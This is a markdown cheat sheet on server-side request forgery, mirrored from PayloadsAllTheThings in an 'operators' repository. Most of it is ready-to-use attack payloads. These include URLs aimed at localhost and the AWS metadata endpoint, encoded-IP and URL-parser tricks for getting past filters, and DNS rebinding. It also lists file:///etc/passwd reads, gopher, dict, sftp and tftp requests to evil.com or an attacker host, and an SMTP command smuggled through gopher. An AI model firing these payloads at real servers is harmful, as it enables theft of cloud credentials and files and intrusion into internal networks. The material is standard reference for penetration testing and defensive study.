daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (21000B)


      1 ---
      2 title: "Server-Side Request Forgery"
      3 topic: "Server Side Request Forgery"
      4 topicSlug: "server-side-request-forgery"
      5 sourcePath: "Server Side Request Forgery/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Request%20Forgery/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Server-Side Request Forgery
     12 
     13 > Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19 * [Bypassing Filters](#bypassing-filters)
     20     * [Default Targets](#default-targets)
     21     * [Bypass Localhost with IPv6 Notation](#bypass-localhost-with-ipv6-notation)
     22     * [Bypass Localhost with a Domain Redirect](#bypass-localhost-with-a-domain-redirect)
     23     * [Bypass Localhost with CIDR](#bypass-localhost-with-cidr)
     24     * [Bypass Using Rare Address](#bypass-using-rare-address)
     25     * [Bypass Using an Encoded IP Address](#bypass-using-an-encoded-ip-address)
     26     * [Bypass Using Different Encoding](#bypass-using-different-encoding)
     27     * [Bypassing Using a Redirect](#bypassing-using-a-redirect)
     28     * [Bypass Using DNS Rebinding](#bypass-using-dns-rebinding)
     29     * [Bypass Abusing URL Parsing Discrepancy](#bypass-abusing-url-parsing-discrepancy)
     30     * [Bypass PHP filter_var() Function](#bypass-php-filter_var-function)
     31     * [Bypass Using JAR Scheme](#bypass-using-jar-scheme)
     32     * [Bypass Using TLD localhost](#bypass-using-tld-localhost)
     33 * [Exploitation via URL Scheme](#exploitation-via-url-scheme)
     34     * [file://](#file)
     35     * [http://](#http)
     36     * [dict://](#dict)
     37     * [sftp://](#sftp)
     38     * [tftp://](#tftp)
     39     * [ldap://](#ldap)
     40     * [gopher://](#gopher)
     41     * [netdoc://](#netdoc)
     42 * [Blind Exploitation](#blind-exploitation)
     43 * [Upgrade to XSS](#upgrade-to-xss)
     44 * [Labs](#labs)
     45 * [References](#references)
     46 
     47 ## Tools
     48 
     49 * [swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) - Automatic SSRF fuzzer and exploitation tool
     50 * [tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - Generates gopher link for exploiting SSRF and gaining RCE in various servers
     51 * [In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) - Python based scanner to find potential SSRF parameters
     52 * [teknogeek/SSRF-Sheriff](https://github.com/teknogeek/ssrf-sheriff) - Simple SSRF-testing sheriff written in Go
     53 * [assetnote/surf](https://github.com/assetnote/surf) - Returns a list of viable SSRF candidates
     54 * [dwisiswant0/ipfuscator](https://github.com/dwisiswant0/ipfuscator) - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go.
     55 * [Horlad/r3dir](https://github.com/Horlad/r3dir) - a redirection service designed to help bypass SSRF filters that do not validate the redirect location. Intergrated with Burp with help of Hackvertor tags
     56 
     57 ## Methodology
     58 
     59 SSRF is a security vulnerability that occurs when an attacker manipulates a server to make HTTP requests to an unintended location. This happens when the server processes user-provided URLs or IP addresses without proper validation.
     60 
     61 Common exploitation paths:
     62 
     63 * Accessing Cloud metadata
     64 * Leaking files on the server
     65 * Network discovery, port scanning with the SSRF
     66 * Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server
     67 
     68 **Example**: A server accepts user input to fetch a URL.
     69 
     70 ```py
     71 url = input("Enter URL:")
     72 response = requests.get(url)
     73 return response
     74 ```
     75 
     76 An attacker supplies a malicious input:
     77 
     78 ```ps1
     79 http://169.254.169.254/latest/meta-data/
     80 ```
     81 
     82 This fetches sensitive information from the AWS EC2 metadata service.
     83 
     84 ## Bypassing Filters
     85 
     86 ### Default Targets
     87 
     88 By default, Server-Side Request Forgery are used to access services hosted on `localhost` or hidden further on the network.
     89 
     90 * Using `localhost`
     91 
     92   ```powershell
     93   http://localhost:80
     94   http://localhost:22
     95   https://localhost:443
     96   ```
     97 
     98 * Using `127.0.0.1`
     99 
    100   ```powershell
    101   http://127.0.0.1:80
    102   http://127.0.0.1:22
    103   https://127.0.0.1:443
    104   ```
    105 
    106 * Using `0.0.0.0`
    107 
    108   ```powershell
    109   http://0.0.0.0:80
    110   http://0.0.0.0:22
    111   https://0.0.0.0:443
    112   ```
    113 
    114 ### Bypass Localhost with IPv6 Notation
    115 
    116 * Using unspecified address in IPv6 `[::]`
    117 
    118     ```powershell
    119     http://[::]:80/
    120     ```
    121 
    122 * Using IPv6 loopback addres`[0000::1]`
    123 
    124     ```powershell
    125     http://[0000::1]:80/
    126     ```
    127 
    128 * Using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
    129 
    130     ```powershell
    131     http://[0:0:0:0:0:ffff:127.0.0.1]
    132     http://[::ffff:127.0.0.1]
    133     ```
    134 
    135 ### Bypass Localhost with a Domain Redirect
    136 
    137 | Domain                       | Redirect to |
    138 |------------------------------|-------------|
    139 | localtest.me                 | `::1`       |
    140 | localh.st                    | `127.0.0.1` |
    141 | spoofed.[BURP_COLLABORATOR]  | `127.0.0.1` |
    142 | spoofed.redacted.oastify.com | `127.0.0.1` |
    143 | company.127.0.0.1.nip.io     | `127.0.0.1` |
    144 
    145 The service `nip.io` is awesome for that, it will convert any ip address as a dns.
    146 
    147 ```powershell
    148 NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
    149 ```
    150 
    151 ### Bypass Localhost with CIDR
    152 
    153 The IP range `127.0.0.0/8` in IPv4 is reserved for loopback addresses.
    154 
    155 ```powershell
    156 http://127.127.127.127
    157 http://127.0.1.3
    158 http://127.0.0.0
    159 ```
    160 
    161 If you try to use any address in this range (127.0.0.2, 127.1.1.1, etc.) in a network, it will still resolve to the local machine
    162 
    163 ### Bypass Using Rare Address
    164 
    165 You can short-hand IP addresses by dropping the zeros
    166 
    167 ```powershell
    168 http://0/
    169 http://127.1
    170 http://127.0.1
    171 ```
    172 
    173 ### Bypass Using an Encoded IP Address
    174 
    175 * Decimal IP location
    176 
    177     ```powershell
    178     http://2130706433/ = http://127.0.0.1
    179     http://3232235521/ = http://192.168.0.1
    180     http://3232235777/ = http://192.168.1.1
    181     http://2852039166/ = http://169.254.169.254
    182     ```
    183 
    184 * Octal IP: Implementations differ on how to handle octal format of IPv4.
    185 
    186     ```powershell
    187     http://0177.0.0.1/ = http://127.0.0.1
    188     http://o177.0.0.1/ = http://127.0.0.1
    189     http://0o177.0.0.1/ = http://127.0.0.1
    190     http://q177.0.0.1/ = http://127.0.0.1
    191     ```
    192 
    193 * Hex IP
    194 
    195     ```powershell
    196     http://0x7f000001 = http://127.0.0.1
    197     http://0xc0a80101 = http://192.168.1.1
    198     http://0xa9fea9fe = http://169.254.169.254
    199     ```
    200 
    201 ### Bypass Using Different Encoding
    202 
    203 * URL encoding: Single or double encode a specific URL to bypass blacklist
    204 
    205     ```powershell
    206     http://127.0.0.1/%61dmin
    207     http://127.0.0.1/%2561dmin
    208     ```
    209 
    210 * Enclosed alphanumeric: `①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽⑾⑿⒀⒁⒂⒃⒄⒅⒆⒇⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑⒒⒓⒔⒕⒖⒗⒘⒙⒚⒛⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ⓪⓫⓬⓭⓮⓯⓰⓱⓲⓳⓴⓵⓶⓷⓸⓹⓺⓻⓼⓽⓾⓿`
    211 
    212     ```powershell
    213     http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
    214     ```
    215 
    216 * Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default. `\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
    217 
    218 ### Bypassing via ipv6 hostname
    219 
    220 * in Linux /etc/hosts contain this line `::1   localhost ip6-localhost ip6-loopback` but work only if http server running in ipv6
    221 
    222    ```powershell
    223    http://ip6-localhost = ::1
    224    http://ip6-loopback = ::1
    225    ```
    226 
    227 ### Bypassing Using a Redirect
    228 
    229 1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
    230 2. Launch the SSRF pointing to `vulnerable.com/index.php?url=http://redirect-server`
    231 3. You can use response codes [HTTP 307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [HTTP 308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection.
    232 
    233 To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use [Horlad/r3dir](https://github.com/Horlad/r3dir).
    234 
    235 * Redirects to `http://localhost` with `307 Temporary Redirect` status code
    236 
    237     ```powershell
    238     https://307.r3dir.me/--to/?url=http://localhost
    239     ```
    240 
    241 * Redirects to `http://169.254.169.254/latest/meta-data/` with `302 Found` status code
    242 
    243     ```powershell
    244     https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me
    245     ```
    246 
    247 ### Bypass Using DNS Rebinding
    248 
    249 Create a domain that change between two IPs.
    250 
    251 * [1u.ms](http://1u.ms) - DNS rebinding utility
    252 
    253 For example to rotate between `1.2.3.4` and `169.254-169.254`, use the following domain:
    254 
    255 ```powershell
    256 make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
    257 ```
    258 
    259 Verify the address with `nslookup`.
    260 
    261 ```ps1
    262 $ nslookup make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
    263 Name:   make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
    264 Address: 1.2.3.4
    265 
    266 $ nslookup make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
    267 Name:   make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
    268 Address: 169.254.169.254
    269 ```
    270 
    271 ### Bypass Abusing URL Parsing Discrepancy
    272 
    273 [A New Era Of SSRF Exploiting URL Parser In Trending Programming Languages - Research from Orange Tsai](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)
    274 
    275 ```powershell
    276 http://127.1.1.1:80\@127.2.2.2:80/
    277 http://127.1.1.1:80\@@127.2.2.2:80/
    278 http://127.1.1.1:80:\@@127.2.2.2:80/
    279 http://127.1.1.1:80#\@127.2.2.2:80/
    280 http:127.0.0.1/
    281 ```
    282 
    283 ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg)
    284 
    285 Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`.
    286 
    287 * `urllib2` treats `1.1.1.1` as the destination
    288 * `requests` and browsers redirect to `2.2.2.2`
    289 * `urllib` resolves to `3.3.3.3`
    290 * Some parsers replace `http:127.0.0.1/` to `http://127.0.0.1/`
    291 
    292 ### Bypass PHP filter_var() Function
    293 
    294 In PHP 7.0.25, `filter_var()` function with the parameter `FILTER_VALIDATE_URL` allows URL such as:
    295 
    296 * `http://test???test.com`
    297 * `0://evil.com:80;http://google.com:80/`
    298 
    299 ```php
    300 <?php 
    301  echo var_dump(filter_var("http://test???test.com", FILTER_VALIDATE_URL));
    302  echo var_dump(filter_var("0://evil.com;google.com", FILTER_VALIDATE_URL));
    303 ?>
    304 ```
    305 
    306 ### Bypass Using TLD localhost
    307 
    308 There was a reserved tld called `.localhost`, it can accept arbiratry domains and resolves to the localhost ip, here is an example
    309 
    310 ```powershell
    311 $ ping PayloadsAllTheThings.localhost -c 1
    312 PING PayloadsAllTheThings.localhost (::1) 56 data bytes
    313 64 bytes from ip6-localhost (::1): icmp_seq=1 ttl=64 time=0.070 ms
    314 
    315 --- PayloadsAllTheThings.localhost ping statistics ---
    316 1 packets transmitted, 1 received, 0% packet loss, time 0ms
    317 rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms
    318 ```
    319 
    320 ### Bypass Using JAR Scheme
    321 
    322 This attack technique is fully blind, you won't see the result.
    323 
    324 ```powershell
    325 jar:scheme://domain/path!/ 
    326 jar:http://127.0.0.1!/
    327 jar:https://127.0.0.1!/
    328 jar:ftp://127.0.0.1!/
    329 ```
    330 
    331 ## Exploitation via URL Scheme
    332 
    333 ### File
    334 
    335 Allows an attacker to fetch the content of a file on the server. Transforming the SSRF into a file read.
    336 
    337 ```powershell
    338 file:///etc/passwd
    339 file://\/\/etc/passwd
    340 ```
    341 
    342 ### HTTP
    343 
    344 Allows an attacker to fetch any content from the web, it can also be used to scan ports.
    345 
    346 ```powershell
    347 ssrf.php?url=http://127.0.0.1:22
    348 ssrf.php?url=http://127.0.0.1:80
    349 ssrf.php?url=http://127.0.0.1:443
    350 ```
    351 
    352 ![SSRF stream](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png)
    353 
    354 ### Dict
    355 
    356 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
    357 
    358 ```powershell
    359 dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
    360 ssrf.php?url=dict://attacker:11111/
    361 ```
    362 
    363 ### SFTP
    364 
    365 A network protocol used for secure file transfer over secure shell
    366 
    367 ```powershell
    368 ssrf.php?url=sftp://evil.com:11111/
    369 ```
    370 
    371 ### TFTP
    372 
    373 Trivial File Transfer Protocol, works over UDP
    374 
    375 ```powershell
    376 ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
    377 ```
    378 
    379 ### LDAP
    380 
    381 Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
    382 
    383 ```powershell
    384 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
    385 ```
    386 
    387 ### Netdoc
    388 
    389 Wrapper for Java when your payloads struggle with "`\n`" and "`\r`" characters.
    390 
    391 ```powershell
    392 ssrf.php?url=netdoc:///etc/passwd
    393 ```
    394 
    395 ### Gopher
    396 
    397 The `gopher://` protocol is a lightweight, text-based protocol that predates the modern World Wide Web. It was designed for distributing, searching, and retrieving documents over the Internet.
    398 
    399 ```ps1
    400 gopher://[host]:[port]/[type][selector]
    401 ```
    402 
    403 This scheme is very useful as it as be used to send data to TCP protocol.
    404 
    405 ```ps1
    406 gopher://localhost:25/_MAIL%20FROM:<attacker@example.com>%0D%0A
    407 ```
    408 
    409 Refer to the SSRF Advanced Exploitation to explore the `gopher://` protocol deeper.
    410 
    411 ## Blind Exploitation
    412 
    413 > When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read.
    414 
    415 Use an SSRF chain to gain an Out-of-Band output: [assetnote/blind-ssrf-chains](https://github.com/assetnote/blind-ssrf-chains)
    416 
    417 **Possible via HTTP(s)**:
    418 
    419 * [Elasticsearch](https://github.com/assetnote/blind-ssrf-chains#elasticsearch)
    420 * [Weblogic](https://github.com/assetnote/blind-ssrf-chains#weblogic)
    421 * [Hashicorp Consul](https://github.com/assetnote/blind-ssrf-chains#consul)
    422 * [Shellshock](https://github.com/assetnote/blind-ssrf-chains#shellshock)
    423 * [Apache Druid](https://github.com/assetnote/blind-ssrf-chains#druid)
    424 * [Apache Solr](https://github.com/assetnote/blind-ssrf-chains#solr)
    425 * [PeopleSoft](https://github.com/assetnote/blind-ssrf-chains#peoplesoft)
    426 * [Apache Struts](https://github.com/assetnote/blind-ssrf-chains#struts)
    427 * [JBoss](https://github.com/assetnote/blind-ssrf-chains#jboss)
    428 * [Confluence](https://github.com/assetnote/blind-ssrf-chains#confluence)
    429 * [Jira](https://github.com/assetnote/blind-ssrf-chains#jira)
    430 * [Other Atlassian Products](https://github.com/assetnote/blind-ssrf-chains#atlassian-products)
    431 * [OpenTSDB](https://github.com/assetnote/blind-ssrf-chains#opentsdb)
    432 * [Jenkins](https://github.com/assetnote/blind-ssrf-chains#jenkins)
    433 * [Hystrix Dashboard](https://github.com/assetnote/blind-ssrf-chains#hystrix)
    434 * [W3 Total Cache](https://github.com/assetnote/blind-ssrf-chains#w3)
    435 * [Docker](https://github.com/assetnote/blind-ssrf-chains#docker)
    436 * [Gitlab Prometheus Redis Exporter](https://github.com/assetnote/blind-ssrf-chains#redisexporter)
    437 
    438 **Possible via Gopher**:
    439 
    440 * [Redis](https://github.com/assetnote/blind-ssrf-chains#redis)
    441 * [Memcache](https://github.com/assetnote/blind-ssrf-chains#memcache)
    442 * [Apache Tomcat](https://github.com/assetnote/blind-ssrf-chains#tomcat)
    443 
    444 ## Upgrade to XSS
    445 
    446 When the SSRF doesn't have any critical impact, the network is segmented and you can't reach other machine, the SSRF doesn't allow you to exfiltrate files from the server.
    447 
    448 You can try to upgrade the SSRF to an XSS, by including an SVG file containing Javascript code.
    449 
    450 ```bash
    451 https://example.com/ssrf.php?url=http://brutelogic.com.br/poc.svg
    452 ```
    453 
    454 ## Labs
    455 
    456 * [PortSwigger - Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost)
    457 * [PortSwigger - Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system)
    458 * [PortSwigger - SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
    459 * [PortSwigger - SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter)
    460 * [PortSwigger - SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection)
    461 * [Root Me - Server Side Request Forgery](https://www.root-me.org/en/Challenges/Web-Server/Server-Side-Request-Forgery)
    462 * [Root Me - Nginx - SSRF Misconfiguration](https://www.root-me.org/en/Challenges/Web-Server/Nginx-SSRF-Misconfiguration)
    463 
    464 ## References
    465 
    466 * [A New Era Of SSRF - Exploiting URL Parsers - Orange Tsai - September 27, 2017](https://web.archive.org/web/20171219113122/https://www.youtube.com/watch?v=D1S-G8rJrEk)
    467 * [Blind SSRF on errors.hackerone.net - chaosbolt - June 30, 2018](https://web.archive.org/web/20180711141712/https://hackerone.com/reports/374737)
    468 * [ESEA Server-Side Request Forgery and Querying AWS Meta Data - Brett Buerhaus - April 18, 2016](https://web.archive.org/web/20251203033430/https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/)
    469 * [Hacker101 SSRF - Cody Brocious - October 29, 2018](https://web.archive.org/web/20240905134609/https://www.youtube.com/watch?v=66ni2BTIjS8)
    470 * [Hackerone - How To: Server-Side Request Forgery (SSRF) - Jobert Abma - June 14, 2017](https://web.archive.org/web/20210805121112/https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
    471 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity - December 17, 2017](http://web.archive.org/web/20171220083457/http://www.sxcurity.pro/2017/12/17/hackertarget/)
    472 * [How I Chained 4 Vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai - July 28, 2017](https://web.archive.org/web/20260305031002/https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
    473 * [Les Server Side Request Forgery : Comment contourner un pare-feu - Geluchat - September 16, 2017](https://web.archive.org/web/20250514163556/https://www.dailysecurity.fr/server-side-request-forgery/)
    474 * [PHP SSRF - @secjuice - theMiddle - March 1, 2018](https://web.archive.org/web/20180308041252/https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
    475 * [Piercing the Veil: Server Side Request Forgery to NIPRNet Access - Alyssa Herrera - April 9, 2018](https://web.archive.org/web/20180418081910/https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
    476 * [Server-side Browsing Considered Harmful - Nicolas Grégoire (Agarri) - May 21, 2015](https://web.archive.org/web/20260212042925/https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
    477 * [SSRF - Server-Side Request Forgery (Types and Ways to Exploit It) Part-1 - SaN ThosH (madrobot) - January 10, 2019](https://web.archive.org/web/20260111214124/https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
    478 * [SSRF and Local File Read in Video to GIF Converter - sl1m - February 11, 2016](https://web.archive.org/web/20250426211714/https://hackerone.com/reports/115857)
    479 * [SSRF in https://imgur.com/vidgif/url - Eugene Farfel (aesteral) - February 10, 2016](https://web.archive.org/web/20250905152736/https://hackerone.com/reports/115748)
    480 * [SSRF in proxy.duckduckgo.com - Patrik Fábián (fpatrik) - May 27, 2018](https://web.archive.org/web/20250623102403/https://hackerone.com/reports/358119)
    481 * [SSRF on *shopifycloud.com - Rojan Rijal (rijalrojan) - July 17, 2018](https://web.archive.org/web/20250623094825/https://hackerone.com/reports/382612)
    482 * [SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP - Willis Vandevanter (@0xrst) - February 5, 2019](https://web.archive.org/web/20260115204744/https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
    483 * [SSRF Tips - xl7dev - July 3, 2016](http://web.archive.org/web/20170407053309/http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
    484 * [SSRF's Up! Real World Server-Side Request Forgery (SSRF) - Alberto Wilson and Guillermo Gabarrin - January 25, 2019](https://web.archive.org/web/20260219110439/https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
    485 * [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例 - mrtc0 - September 5, 2018](https://web.archive.org/web/20250717205545/https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
    486 * [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - June 12, 2019](https://github.com/allanlw/svg-cheatsheet)
    487 * [URL Eccentricities in Java - sammy (@PwnL0rd) - November 2, 2020](http://web.archive.org/web/20201107113541/https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
    488 * [Web Security Academy Server-Side Request Forgery (SSRF) - PortSwigger - July 10, 2019](https://web.archive.org/web/20190710130620/https://portswigger.net/web-security/ssrf)
    489 * [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG (@quanyang) - June 22, 2016](https://web.archive.org/web/20260301043216/https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)